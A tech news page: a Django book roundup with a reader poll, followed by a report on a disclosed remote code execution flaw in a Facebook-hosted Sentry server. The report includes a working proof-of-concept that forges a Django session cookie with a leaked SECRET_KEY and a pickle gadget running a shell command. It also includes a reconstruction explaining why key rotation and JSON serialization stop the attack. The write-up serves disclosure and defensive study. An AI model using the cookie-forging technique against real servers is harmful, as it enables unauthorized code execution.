Django books overview

Two Scoops of Django, Beginning Django CMS and Django Unleashed books overview
16 August 2017   33772

Django is one of the most popular frameworks for Python, which is the number one programming language in the world according to the IEEE Spectrum ranking.

Let's take a look at a few interesting Django books.

Two Scoops of Django: Best Practices for Django 1.8

This book is full of material that will help you with your Django projects. Authored by Daniel Roy Greenfeld and Audrey Roy Greenfeld.

Two Scoops of Django

It will introduce you to the tips, tricks, patterns, code snippets, and techniques the authors have picked up over the years. This edition is an update and expansion of the previous ones:

  • Updated for Django 1.8 and changes in the Django ecosystem, with corrections and clarifications added thanks to feedback from the authors' readers and technical reviewers.
  • Revised material on templates, consuming REST APIs, replacing core components of Django, and more.
  • 85+ pages of new material on Jinja2, debugging, advanced query tools, data validation, testing, security, and more.

Available here

Beginning Django CMS

Beginning Django CMS shows you how to build a dynamic website with a full content management system in the backend easily. It is written for Internet developers who are tired of dealing with complicated, bloated website frameworks that are a pain to build and a nightmare to maintain. Django CMS is an Open Source website building framework that is experiencing exponential growth because it is built on the simple, secure and scalable architecture of Django. This book takes you from knowing nothing about Django CMS, to building a functional website and content management system that you can deploy for your own website or for your customers. 

Beginning Django CMS

What You'll Learn:

  • Install and configure Django CMS
  • Build a dynamic website quickly and easily
  • Author and submit content for publication
  • Administer Django CMS
  • Install and use custom and third-party plugins
  • Deploy a website using Django CMS

    Beginning Django CMS is for programmers, in particular Python and Django programmers, wishing to build a simple, custom content management system (CMS). 

Available at Amazon.

Django Unleashed

Django Unleashed is your step-by-step, beginner-friendly guide to leveraging Django’s core capabilities and its powerful contributed library. You’ll learn in the most effective way possible: hands on, by building a fully functional Django website from scratch. You’ll even deploy the website to the cloud.

Django Unleashed

This book covers topics such as:

  • Quickly start a new Django project and establish a strong foundation for a growing site
  • Define how your data is organized and create a SQLite database to manage it
  • Quickly produce HTML with Django templates
  • Create dynamic webpages with Django’s URL patterns and views, including function views, class-based views, and generic views
  • Enable efficient, reliable data input with Django Forms and custom form validations
  • Understand the Model-View-Controller (MVC) architecture, compare it to Django's Model-Template-View, and gain a holistic understanding of Django's structure
  • Write as little code as possible, simplify code reuse, and mitigate software decay by adhering to the Don’t Repeat Yourself paradigm.
  • Dive into Django source code to troubleshoot problems
  • Extend site functionality with Django’s contributed library
  • Protect your site with user authentication and permissions
  • Avoid security pitfalls such as SQL Injection, XSS, and CSRF
  • Optimize site performance
  • Deploy your site to a managed cloud service and to a PostgreSQL database

Get it at Amazon.

Which Django book do you like the most?

Which Django book do you prefer? Maybe you have already read some of them? Please share your thoughts with the community. After voting you will be able to see what people like the most. Your opinion is very valuable to the Hype.Codes team.

Django Unleashed
63% (5 votes)
Two Scoops of Django: Best Practices for Django 1.8
25% (2 votes)
Beginning Django CMS
13% (1 vote)
Total votes: 8

Another Facebook Vulnerability Found

A cybersecurity specialist from SCRT found a way to execute code remotely on a Facebook server
27 August 2018   605

Daniel Le Gall from SCRT reported a vulnerability he found on one of Facebook's servers. The problem was in Sentry, a log-collection web application written in Python on the Django framework. Facebook has since patched the hole.

Daniel found the problem while scanning IP address ranges belonging to the social network. One of the hosts was running Sentry under the hostname sentryagreements.thefacebook.com. While reviewing the application he noticed a stack trace that appeared for no obvious reason, and problems with the password reset function. According to him, Django's debug mode had not been disabled, so the error page dumped the application's entire environment, including its settings:

Facebook Vulnerability

Among the exposed settings the SCRT researcher spotted SESSION_SERIALIZER set to django.contrib.sessions.serializers.PickleSerializer. As Daniel explained, a forged session containing arbitrary Pickle data (Python's binary object serialization format) lets an attacker run any code on the system, because unpickling can invoke arbitrary callables. The only thing standing in the way is the signature: Django checks the session cookie's HMAC before deserializing it, and the signing key is the Django SECRET_KEY. That key appeared in plaintext in the list of Sentry settings as system.secret-key, which removed the last barrier (Django has used JSONSerializer, which cannot carry code, by default since 1.6):

Facebook Vulnerability

The researcher wrote a proof-of-concept script that replaced the contents of his existing sentrysid session cookie with an arbitrary object whose unpickling runs `sleep 30`, so the affected page took 30 seconds longer to load, a time-based confirmation that the command executed on the server:

#!/usr/bin/python
# Proof of concept from the SCRT writeup (Python 2): forge a signed Sentry
# session cookie whose unpickling runs a command on the server.
import os
import django.core.signing
import django.contrib.sessions.serializers

SECRET_KEY = '[RETRIEVEDKEY]'  # the leaked system.secret-key value
# Initial cookie I had on sentry when trying to reset a password
cookie = 'gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'

# Check the signature with the leaked key and unpickle the session dict,
# exactly as the signed_cookies session backend does server-side.
newContent = django.core.signing.loads(
    cookie, key=SECRET_KEY,
    serializer=django.contrib.sessions.serializers.PickleSerializer,
    salt='django.contrib.sessions.backends.signed_cookies')

class PickleRce(object):
    # pickle calls the returned callable with these args on load,
    # so unpickling this object runs `sleep 30` on the server.
    def __reduce__(self):
        return (os.system, ("sleep 30",))

newContent['testcookie'] = PickleRce()

# Re-serialize and re-sign with the leaked key; the printed value replaces
# the sentrysid cookie in the next request.
print django.core.signing.dumps(
    newContent, key=SECRET_KEY,
    serializer=django.contrib.sessions.serializers.PickleSerializer,
    salt='django.contrib.sessions.backends.signed_cookies', compress=True)
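The following added example is not from the SCRT writeup and is not Sentry's or Django's code. It re-creates the mechanism with only the Python standard library (Python 3): a signed session cookie modelled on Django's signed_cookies backend (the HMAC key derivation and cookie layout are simplified and are assumptions; no timestamp is included), a PickleSerializer and a JSONSerializer, and an attacker who holds the leaked key. The gadget returns `eval("6 * 7")` instead of `os.system("sleep 30")` so that execution is visible as the value 42 in the loaded session. It also shows why the two obvious fixes work: rotating SECRET_KEY makes the forged cookie fail the signature check before anything is deserialized, and switching to JSONSerializer makes the pickle payload unreadable even when the signature is valid. The key string and the session contents are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
import pickle

# Salt name of Django's signed_cookies session backend, reused here as a label.
SALT = "django.contrib.sessions.backends.signed_cookies"


def _b64encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _signature(payload: str, key: str) -> str:
    # Salted HMAC in the spirit of django.core.signing; the key derivation
    # is simplified (assumption) and does not affect the argument.
    derived = hashlib.sha256((SALT + "signer" + key).encode()).digest()
    return _b64encode(hmac.new(derived, payload.encode(), hashlib.sha256).digest())


class PickleSerializer:
    """The SESSION_SERIALIZER Sentry had configured: pickle.loads can call code."""
    dumps = staticmethod(pickle.dumps)
    loads = staticmethod(pickle.loads)


class JSONSerializer:
    """Django's default serializer since 1.6: plain data only, no callables."""
    @staticmethod
    def dumps(obj):
        return json.dumps(obj).encode("utf-8")

    @staticmethod
    def loads(data):
        return json.loads(data.decode("utf-8"))


def dumps(obj, key, serializer):
    payload = _b64encode(serializer.dumps(obj))
    return payload + ":" + _signature(payload, key)


def loads(cookie, key, serializer):
    payload, _, sig = cookie.rpartition(":")
    if not hmac.compare_digest(sig, _signature(payload, key)):
        raise ValueError("BadSignature")  # rejected before any deserialization
    return serializer.loads(_b64decode(payload))


class PickleRce:
    # Same gadget shape as the PoC: pickle stores (callable, args) and calls
    # it on load. eval stands in for os.system so the result is observable.
    def __reduce__(self):
        return (eval, ("6 * 7",))


def forge_cookie(victim_cookie, leaked_key):
    """Attacker side: open the legitimate session, add the gadget, re-sign."""
    session = loads(victim_cookie, leaked_key, PickleSerializer)
    session["testcookie"] = PickleRce()
    return dumps(session, leaked_key, PickleSerializer)


def server_load(cookie, key, serializer):
    """Server side: the session dict, or None when the cookie is rejected."""
    try:
        return loads(cookie, key, serializer)
    except (ValueError, pickle.UnpicklingError, UnicodeDecodeError):
        return None


def demo():
    leaked_key = "system.secret-key-as-shown-on-the-debug-page"  # constructed stand-in
    victim = dumps({"testcookie": "worked"}, leaked_key, PickleSerializer)
    forged = forge_cookie(victim, leaked_key)
    return {
        # 1. leaked key + PickleSerializer: signature passes and the gadget runs
        "pickle": server_load(forged, leaked_key, PickleSerializer),
        # 2. SECRET_KEY rotated after the leak: signature fails, nothing is unpickled
        "rotated": server_load(forged, "rotated-after-incident", PickleSerializer),
        # 3. JSONSerializer: signature passes, but pickle bytes are not JSON
        "json": server_load(forged, leaked_key, JSONSerializer),
        # a legitimate JSON session still round-trips under the same key
        "json_ok": server_load(dumps({"testcookie": "worked"}, leaked_key, JSONSerializer),
                               leaked_key, JSONSerializer),
    }
```

Running `demo()` gives `{"testcookie": 42}` for the vulnerable configuration (the gadget ran during unpickling), `None` for both the rotated key and the JSON serializer, and the original dict for the legitimate JSON cookie. The order of the two checks is the point: the signature is verified first, so the deserializer is only reachable by someone who can sign, and with PickleSerializer "can sign" means "can execute code". After a key leak like this one, rotating SECRET_KEY is mandatory (it invalidates every existing signed cookie, not just forged ones), and moving to JSONSerializer removes the code-execution path even if the key leaks again.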

He reported the vulnerability to the Facebook security team and received $5,000 under the Bug Bounty program. Facebook fixed the issue within 10 days of receiving the report.